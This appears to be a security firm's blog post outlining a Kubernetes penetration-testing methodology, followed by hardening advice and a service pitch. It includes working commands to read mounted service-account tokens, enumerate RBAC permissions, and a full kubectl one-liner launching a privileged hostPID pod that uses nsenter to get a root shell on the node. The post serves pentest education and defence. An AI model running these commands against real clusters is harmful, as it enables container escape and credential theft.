Kubernetes Penetration Testing: An Attacker’s Methodology for 2026

Attackers in 2026 do not just port-scan a cluster — they speak Kubernetes. This is the attacker methodology for a Kubernetes pentest: from an initial pod foothold to cluster-admin, mapped to the commands a tester actually runs.

1. Enumerate from the foothold

Assume a compromised pod (a web app RCE is the usual entry). The first prize is the mounted service-account token:

cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
# Use it against the API server
kubectl --token=$TOKEN auth can-i --list

auth can-i --list is the single most useful command — it tells you exactly what this identity is allowed to do.

2. Abuse over-permissive RBAC

Most clusters leak privilege through RBAC. High-value findings:

• create pods → run a privileged pod that mounts the host filesystem and escape to the node.
• get/list secrets → harvest tokens and credentials cluster-wide.
• create pods/exec → shell into other workloads.
• Binding to cluster-admin via an over-broad RoleBinding.

# Classic node escape: a pod that mounts the host root
kubectl run pwn --image=alpine --overrides='{"spec":{"hostPID":true,"containers":[{"name":"x","image":"alpine","securityContext":{"privileged":true},"command":["nsenter","--mount=/proc/1/ns/mnt","--","bash"]}]}}' -it

3. Admission control & the supply chain

Check whether Pod Security Admission or an OPA/Gatekeeper/Kyverno policy actually blocks privileged pods — many clusters install it in audit mode and never enforce. Then look at image provenance: an attacker who can push to the registry the cluster trusts owns the cluster.

Defences

1. Least-privilege RBAC — audit with kubectl auth can-i and tools like kubiscan/rbac-police.
2. Enforce Pod Security Admission at restricted; block privileged and hostPath.
3. Disable auto-mount of service-account tokens where not needed (automountServiceAccountToken: false).
4. Network policies to stop pod-to-API and lateral movement.

RingSafe runs attacker-perspective Kubernetes and cloud-native pentests. See our VAPT services.